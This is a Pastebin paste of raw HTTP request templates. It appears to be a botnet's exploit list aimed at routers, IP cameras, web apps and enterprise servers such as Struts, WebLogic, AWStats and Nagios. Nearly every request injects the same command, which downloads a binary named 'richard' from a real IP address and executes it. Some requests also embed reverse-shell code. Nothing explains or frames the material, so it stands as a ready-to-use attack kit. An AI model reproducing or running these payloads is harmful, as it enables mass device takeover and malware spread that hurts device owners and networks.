Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- POST /portal/apis/aggrecate_js.cgi?script=launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22 HTTP/1.0
- Content-Length: 630
- Accept-Encoding: gzip, deflate
- Accept: /
- User-Agent: Hello-World
- Connection: keep-alive
- POST /stainfo.cgi?ifname=eth0;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- GET /cgi-bin/masterCGI?ping=nomip&user=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- GET /cgi-bin/script?wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- GET /cgi-bin/test?iperf=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- Host: %s:80
- GET /Main_Analysis_Content.asp?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=www.target.com&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&applyFlag=1&preferred_lang=EN&firmver=1.1.2.3_345-g987b580&cmdMethod=ping&destIP=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard&pingCNT=5 HTTP/1.0
- Host: 192.168.0.1:80
- Connection: keep-alive
- Pragma: no-cache
- Cache-Control: no-cache
- Upgrade-Insecure-Requests: 1
- Connection: keep-alive
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
- Referer: http://www.target.com/Main_Analysis_Content.asp
- Accept-Encoding: gzip, deflate
- Accept-Language: en-US,en;q=0.9
- GET /apply.cgi?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=192.168.1.1&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=ping+-c+5+%3B+ls+-l&firmver=3.0.0.4&cmdMethod=ping&destIP=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard&pingCNT=5 HTTP/1.0
- Host: 192.168.1.1:80
- Proxy-Connection: keep-alive
- Authorization: Basic ZGVmYXVsdA==
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36
- Referer: http://192.168.1.1/Main_Analysis_Content.asp
- Accept-Encoding: gzip,deflate,sdch
- Accept-Language: en-US,en;q=0.8
- POST /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.0
- Host: %s:8080
- "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
- GET /awstatstotals/awstatstotals.php?sort=].passthru('echo%20YYY;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;echo%20YYY;').exit().%24a[ HTTP/1.0
- sort=].phpinfo().exit().$a[
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
- Connection: Close
- GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;echo%20YYY;echo| HTTP/1.0
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
- Connection: Close
- GET /cgi-bin/awstats.pl?migrate=|echo;echo%20YYY;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;echo%20YYY;echo|awstats HTTP/1.0
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
- Connection: Close
- GET /cgi-bin/img.pl?f=etc/hosts&f=%Q!bin/sh -c echo 'YYY';wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard; echo 'YYY'|! HTTP/1.0
- GET /cgi-bin/preview_email.cgi?file=/mail/mlog/|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- Host: %s:80
- POST /upnpisapi?uuid:+urn:beckhoff.com:serviceId:cxconfig HTTP/1.0
- User-Agent: Hello-World
- Host: 192.168.0.1:5120
- Content-type: text/xml; charset=utf-8
- SOAPAction: urn:beckhoff.com:service:cxconfig:1#Write
- M-SEARCH * HTTP/1.1
- HOST: 239.255.255.250:1900
- MAN: ssdp:discover
- MX: 3
- ST: upnp:rootdevice
- <?xml version="1.0" encoding="utf-8"?><s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><u:Write xmlns:u="urn:beckhoff.com:service:cxconfig:1"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup><IndexOffset>wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard</IndexOffset><pData>AQAAAAAA</pData></u:Write></s:Body></s:Envelope>
- POST /upnp/control/basicevent1 HTTP/1.0
- Host: %s:49152
- Connection: keep-alive
- Accept-Encoding: gzip, deflate Accept: */*
- User-Agent: python-requests/2.18.4
- SOAPAction: urn:Belkin:service:basicevent:1#SetSmartDevInfo
- Content-Length: 393
- <?xml version="1.0" encoding="utf-8"?> <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <s:Body><u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1"> <SmartDevURL>wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard</SmartDevURL> </u:SetSmartDevInfo> </s:Body> </s:Envelope>
- GET /cgi-bin/operator/servetest?cmd=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- Authorization: Basic YWRtaW46YWRtaW4=
- Server: Boa/0.94.14rc21
- Accept-Ranges: bytes
- Connection: close
- Content-type: text/plain
- POST /cgi-bin/file_transfer.cgi?file_transfer=new&dir='Pa_Note;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;Pa_Note HTTP/1.0
- Content-Type: application/x-www-form-urlencoded
- GET /ccbill/whereami.cgi?g=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- Host: %s:80
- POST /sdwan/nitro/v1/config/get_package_file?action=file_download/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % 99999; wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- 'SSL_CLIENT_VERIFY' : 'SUCCESS'
- get_package_fil:
- site_name: 'blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_0';#,appliance_type: primary,package_type: active
- POST /web/cgi-bin/usbinteract.cgi?action=7&path="|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard|| HTTP/1.0
- Host: 192.168.0.1:9000
- Content-Length: 155
- Content-Type: application/x-www-form-urlencoded
- POST /dogfood/mail/spell.php?data=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- POST /apps/a3/cfg_ethping.cgi?MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard+%26 HTTP/1.0
- POST /cgi-bin/;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- POST /service/krashrpt.php?kuid=`id | wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard` HTTP/1.0
- Host: 192.168.0.1:80
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept: /
- User-Agent: Hello-World
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Cookie: kboxid=r8cnb8r3otq27vd14j7e0ahj24
- Connection: close
- Upgrade-Insecure-Requests: 1
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 37
- POST /soap.cgi?service=WANIPConn1 HTTP/1.0
- Content-Length: 649
- Host: 10.8.28.133:49152
- Content-Type: text/xml
- SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
- <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription></NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>
- GET /webadmin/script?command=|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- POST /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1 HTTP/1.0
- Host: %s:80
- {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://%s/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
- GET /recordings/misc/callme_page.php?action=c&callmenum=@from-internal/n%0D%0AApplication:%20system%0D%0AData:wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard HTTP/1.0
- GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard HTTP/1.0
- POST /uapi-cgi/viewer/admin/testaction.cgi?&type=ip&ip=eth0%20wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard|ping%20-c%203%201.1.1.1|x HTTP/1.0
- Content-Length: 630
- Accept-Encoding: gzip, deflate
- Accept: /
- User-Agent: Hello-World
- Connection: keep-alive
- GET /api/project/repo/log/graph/%60cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%60 HTTP/1.0
- POST /api/backup/logout.cgi?sid=aa;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- Content-type: text/html
- GET /protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- POST /html/SetSmarcardSettings.php?HidChannelID=2&HidcmbBook=0&cmbBook=0|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard+%23&HidDisOffSet=13&txtOffSet=37&HidDataFormat=1&HidDataFormatVal=1&DataFormat=1&HidFileAvailable=0&HidEncryAlg=0&EncryAlg=0&HidFileType=0&HidIsFileSelect=0&HidUseAsProxCard=0&HidVerForPHP=1.00.08
- HTTP/1.0
- Content-Length: 11660
- Content-Type: application/x-www-form-urlencoded
- Connection: close
- X-Powered-By: PHP/5.5.13
- User-Agent: joxypoxy/7.2.6
- GET /setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard aux&message= HTTP/1.0
- Host: 192.168.1.1:80
- Authorization: Basic YWRtaW46YWRtaW4=
- GET /awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%22%26 HTTP/1.0
- GET /nagios/cgi-bin/statuswml.cgi?ping=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- POST /u/jsp/tools/exec.jsp?command=cmd+%2Fc+ping&argument=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard+%7C+whoami&async_output=ping1487856455258&isWindows=true HTTP/1.0
- Host: %s:8081
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:18.0) Gecko/20100101 Firefox/18.0
- Accept: */*
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- X-Requested-With: XMLHttpRequest
- Referer: http://%s:8081/u/index.jsp
- Content-Length: 97
- Cookie: JSESSIONID=542B58462355E4E3B99FAA42842E62FF
- Connection: close
- Pragma: no-cache
- Cache-Control: no-cache
- GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;%27 HTTP/1.0
- POST /global_data?Cookie:CGISESSID=e6f1106605b5e8bee6114a3b5a88c5b4`wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard`; APNConfigEditorSession=0qnfarge1v62simtqeb300lkc7; HTTP/1.0
- Host: %s:443
- Connection:close
- GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;%27 HTTP/1.0
- Host: 192.168.0.1:50000
- Connection: keep-alive
- Cache-Control: max-age=0
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
- Accept-Encoding: gzip, deflate
- Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
- Cookie: PHPSESSID=7b74657ab949a442c9e440ccf050de1e; lang=en
- GET /scripts/rpc.php?action=updatetime×erver=||wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- GET /utility.cgi?testType=1&IP=aaa || wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- Host: %s:80
- POST /op5config/welcome?do=do=Login&password=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- Connection: Close
- GET /monitor/op5/nacoma/command_test.php?cmd_str=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- GET /OvCgi/connectedNodes.ovpl?node=a|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- POST /_async/AsyncResponseServiceHttps HTTP/1.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- Accept-Language: en
- User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
- User-Agent: Hello-World
- Connection: close
- Content-Type: text/xml
- <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService" <soapenv:Header>
- <wsa:Action>xx</wsa:Action>
- <wsa:RelatesTo>xx</wsa:RelatesTo>
- </work:WorkContext> xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"><void index="0"><string>cmd</string></void><void index="1"><string>wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
- POST /moadmin/moadmin.php?object=1;system(wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard);exit HTTP/1.0
- Host: 192.168.0.1:80
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)Gecko/20100101 Firefox/36.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- DNT: 1
- Connection: keep-alive
- Pragma: no-cache
- Cache-Control: no-cache
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 34
- GET /p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- POST /parse_xml.cgi?filename=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- Content-Length:
- Content-Type: application/x-www-form-urlencoded
- POST /users/%2f/%2fproc%2fself%2fcomm?<%=`wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard`%> HTTP/1.0
- Content-Type: multipart/form-data; boundary=
- POST /wanipcn.xml HTTP/1.0
- Content-Length: 630
- Accept-Encoding: gzip, deflate
- SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
- Accept: /
- User-Agent: Hello-World
- Connection: keep-alive
- <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
- GET /repository/annotate?rev=`wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard` HTTP/1.0
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
- Connection: Close
- POST /SGPAdmin/fileRequest?&invoker=&title=¶ms=&id=&cmd=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard&source=&query= HTTP/1.0
- GET /goform/formSysCmd?sysCmd=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;&apply=Apply&submit-url=/syscmd.asp&msg= HTTP/1.0
- GET /index.php?plot=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- Host: %s:80
- POST cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;&ping_count=1&action=Apply&html_view=ping HTTP/1.0
- GET /action.php?host:;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard&PingCheck=Test HTTP/1.0
- Host: %s:80
- GET /?search[send][]=eval&search[send][]=Kernel.fork%20do%60wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%60end HTTP/1.0
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
- Connection: Close
- GET /qsrserver/device/getThumbnail?sourceUri=
- +-;rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f+|+/bin/sh+-i+2>&1+|+;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard; > /tmp/f&targetUri=/tmp/thumb/test.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&=1537275717150 HTTP/1.0
- GET /mnt_ping.cgi?isSubmit=1&addrType=3&pingAddr=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard&send=Send HTTP/1.0
- POST /page/maintenance/lanSettings/dns?dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%60 HTTP/1.0
- Host: 192.168.0.1:80
- Content-Length: 64
- Accept: */*
- Origin: http://192.168.0.1
- X-Requested-With: XMLHttpRequest
- User-Agent: Testingus/1.0
- Content-Type: application/x-www-form-urlencoded
- Referer: http://192.168.0.1/maintenance
- Accept-Language: en-US,en;q=0.8,mk;q=0.6
- Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b
- Connection: close
- GET /VhttpdMgr?action=importFile&fileName=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- Host: %s:80
- POST /smartdomuspad/modules/reporting/track_import_export.php?op=export&language=english&interval=1&object_id=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- Host: 192.168.0.1
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
- Accept: /
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Connection: close
- Cookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 86
- POST /upnp/control/hag HTTP/1.0
- Host: %s:49451
- Accept: text/javascript, text/html, application/xml, text/xml, */*
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip, deflate
- X-Requested-With: XMLHttpRequest
- X-Prototype-Version: 1.7
- Content-Type: text/xml;charset=UTF-8
- MIME-Version: 1.0
- Content-Length: 311
- Connection: keep-alive
- Pragma: no-cache
- SOAPAction: urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua
- <s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body> <u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1"> <DeviceNum></DeviceNum> <Code>os.execute(wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard)</Code> </u:RunLua></s:Body></s:Envelope>
- POST /scripts/ajaxPortal.lua?destination=8.8.8.8$(wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard)&source=192.168.0.1&test=BASIC_PING&requestTimeout=90&auth_token=&_cmd=run_diagnostic&destination=8.8.8.8$(wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard)&test=DNS_TEST&requestTimeout=90&auth_token=&_cmd=run_diagnostic HTTP/1.0
- User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
- Accept: application/json, text/javascript, */*; q=0.01
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Referer: https://www.vmware.com
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- X-Requested-With: XMLHttpRequest
- Cookie: culture=en-us
- Connection: close
- POST /password_change.cgi?user=root&pam=&expired=2&old=AkkuS%7cwget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%20&new1=akkuss&new2=akkuss HTTP/1.0
- Host: %s:10000
- cookie:redirect=1; testing=1; sid=x; sessiontest=1
- Content-Type:application/x-www-form-urlencoded
- POST /cgi-bin/rdfs.cgi?Client=;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;&Download=submit HTTP/1.0
- Host: 192.168.0.1:80
- application/x-www-form-urlencoded
- Content-Length: 1024
- GET /cgi-bin/ccbill/whereami.cgi?g=wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- Host: %s:80
- GET /system.ini?loginuse&loginpas HTTP/1.0
- GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget http://145.249.106.241/richard; chmod +x richard; sh richard)&dir=/&mode=PORT&upload_interval=0 HTTP/1.0
- GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s HTTP/1.0
- GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0 HTTP/1.0
- POST /actionHandler/ajax_network_diagnostic_tools.php?test_connectivity=true&destination_address=www.comcast.net || wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard; &count1=4 HTTP/1.0
- Host: 10.0.0.1:80
- User-Agent:
- Accept: application/json, text/javascript, */*; q=0.01
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- X-Requested-With: XMLHttpRequest
- Referer: http://10.0.0.1/network_diagnostic_tools.php
- Content-Length: 91
- Cookie: PHPSESSID=; auth=
- DNT: 1
- X-Forwarded-For: 8.8.8.8
- Connection: keep-alive
- GET /pages/systemcall.php?command=|wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard HTTP/1.0
- POST /cgi-bin/cgiServer.exx?system(wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard) HTTP/1.0
- Host: 10.0.75.122:80
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Authorization: Basic YWRtaW46YWRtaW4=
- Connection: keep-alive
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 0
- GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/richard; chmod +x richard; sh richard;%22 HTTP/1.0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement